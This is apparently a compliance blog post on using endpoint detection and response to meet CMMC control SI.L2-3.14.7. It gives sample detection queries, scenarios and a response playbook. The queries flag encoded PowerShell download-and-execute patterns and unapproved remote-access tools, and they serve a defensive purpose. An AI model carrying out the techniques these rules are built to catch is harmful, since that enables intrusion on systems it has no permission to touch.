Endpoint Detection and Response (EDR) is a required, practical control for identifying unauthorized use of organizational systems under NIST SP 800-171 Rev.2 / CMMC 2.0 Level 2 (SI.L2-3.14.7); this post explains how to instrument EDR, the telemetry to collect, sample detection queries you can start using today, and how a small business can meet the control with realistic operational steps.
What the control means and implementation overview
SI.L2-3.14.7 expects organizations to actively use endpoint monitoring tools to detect unauthorized use of systems — this includes access by unauthorized users, execution of unauthorized software, and remote access or command-and-control activity that indicates a system is being used outside defined policy. For implementation: deploy an EDR agent to all managed endpoints, integrate the EDR with centralized logging/alerting (SIEM or cloud-native analytics), maintain an authoritative asset inventory, and document allowed software and administrative accounts (a whitelist/allowlist) so the EDR can distinguish authorized from unauthorized behavior.
Telemetry and technical details to collect
To effectively detect unauthorized use, ensure your EDR collects at minimum: process creation events (with full command line), parent process, file hash (SHA256), user and account context, network connections (local and remote IP/port), service and driver installations, new user account creation, modifications to authentication/authorization artifacts, and removable-media attachments. Capture timestamps in UTC, and retain raw event data for at least the minimum period your compliance posture requires (commonly 90 days for detection, 1 year for investigations depending on contract). Also forward privileged authentication logs (Active Directory/Azure AD), VPN and remote access logs to correlate with endpoint events.
Example detection queries (actionable, vendor-specific examples)
Below are ready-to-use example queries for common EDR platforms and osquery that detect unauthorized or anomalous use. Replace placeholders (like IP ranges, allowed tool lists, and admin accounts) with your environment specifics and tune thresholds to reduce false positives.
// 1) Suspicious PowerShell with encoded commands (commonly used for unauthorized remote execution)
DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine has "-enc" or ProcessCommandLine has "IEX" or ProcessCommandLine has "DownloadFile"
| project Timestamp, DeviceName, InitiatingProcessAccountName, ProcessCommandLine, InitiatingProcessFileName, FileHash
// 2) RDP sessions originating from external IPs (replace 10.0.0.0/8 with your internal ranges)
DeviceNetworkEvents
| where RemotePort == 3389 and not(IPv4IsInRange(RemoteIP, "10.0.0.0/8") or IPv4IsInRange(RemoteIP, "192.168.0.0/16"))
| summarize count() by RemoteIP, DeviceName, InitiatingProcessFileName, bin(Timestamp, 1h)
// 3) Process launch of unapproved remote-access tools
process where process.name : ("TeamViewer.exe", "AnyDesk.exe", "splashtop.exe", "logmein.exe")
| fields @timestamp, host.name, user.name, process.command_line, process.parent.name
// 4) New local user creation on Windows (Security Event 4720 ingested)
event.category: "authentication" and event.code: "4720"
-- 5) Recently created local users (last 24 hours)
SELECT username, uid, gid, description, directory, shell, time FROM users WHERE time > strftime('%s','now') - 86400;
-- 6) USB devices attached in the last 24 hours (audit removable media)
SELECT vendor, serial, model, device_id, last_seen FROM usb_devices WHERE last_seen > strftime('%s','now') - 86400;
Use these queries as detection templates: add allowlists such as approved admin usernames, IP ranges for legitimate remote access providers, and an approved software inventory. Configure alerting for high-confidence matches and set lower-severity findings to a continuous tuning workflow.
Real-world small-business scenarios and application
Scenario A — a small engineering shop with 40 endpoints: an employee installs an unmanaged remote-access tool to let a contractor troubleshoot. Detection: EDR query for unapproved remote-access tools triggers; remediation: IT isolates the endpoint, removes the tool, and reviews network sessions for data exfiltration. Scenario B — a healthcare subcontractor with protected CUI: an intern uses personal cloud-sync software to move files to a personal account. Detection: EDR process creation plus network connection to cloud storage provider flagged; response: suspend account, preserve endpoint artifacts, and perform forensic review. Both scenarios show how EDR can detect unauthorized use actions that policy alone won't prevent.
Operational playbook: triage, response, and evidence preservation
When an EDR alert indicates unauthorized use, follow a documented playbook: (1) Triage — validate the alert, check asset owner and allowlists; (2) Contain — isolate device from network or block remote IP hashes where appropriate; (3) Collect — take EDR snapshots, get process trees, memory images if needed; (4) Remediate — remove unauthorized software, rotate credentials if compromised, patch vulnerabilities used for access; (5) Recover and review — restore services from known-good images and update policy and detection rules. Record all steps in your incident log to support compliance evidence for audits under NIST/CMMC.
Compliance tips, tuning, and best practices
Practical tips: (1) Start with a baseline period (30 days) to establish normal behavior and reduce false positives; (2) Maintain an allowlist of approved admin accounts, remote management tools, and trusted IP ranges; (3) Ensure role-based access to EDR consoles and audit changes to detection rules; (4) Automate evidence collection for high-severity alerts to preserve chain of custody; (5) Document policies — e.g., acceptable remote access tools and removable media rules — and map detected events to policy violations for corrective action. Also ensure log retention meets contractual and regulatory requirements and include EDR evidence in your System Security Plan (SSP) and Plan of Action & Milestones (POA&M) when required by NIST SP 800-171.
Risk of not implementing effective EDR detections
Without EDR tuned to identify unauthorized use, small organizations face increased risk of credential theft, lateral movement, data exfiltration of CUI, contract loss, and regulatory penalties. Many breaches begin with seemingly legitimate user actions (installing remote tools, enabling file sync) — without detection, these escalate unnoticed. Additionally, failure to demonstrate monitoring and detection capabilities can result in non-compliance findings in NIST SP 800-171/CMMC assessments and loss of government contracts.
Summary: Deploy an EDR with comprehensive process, network, and user telemetry, integrate it with centralized analytics, and use targeted detection queries (examples above) to spot unauthorized use. For small businesses, focus first on high-risk detections (remote access, suspicious command execution, new user creation, removable-media transfers), document your playbook and rules, and continuously tune allowlists and thresholds to balance detection coverage with operational noise — these steps will help you meet SI.L2-3.14.7 and reduce real-world risk.
